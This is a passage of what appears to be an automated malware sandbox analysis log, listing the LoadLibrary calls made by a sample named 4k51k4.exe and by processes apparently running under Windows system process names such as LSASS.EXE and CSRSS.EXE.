\"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006056)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002532)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003812)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003812)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002828)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002852)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002852)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002832)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002832)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003980)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003980)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003688)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000352)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002816)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002816)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003528)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003528)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004264)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004264)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003032)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003032)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004280)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000344)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002240)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004132)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003748)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003748)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003748)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003748)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003480)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003480)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003556)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003556)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001728)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001728)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003200)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003200)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003216)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003216)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000304)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001888)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001888)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001860)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001860)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002404)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002404)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001480)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 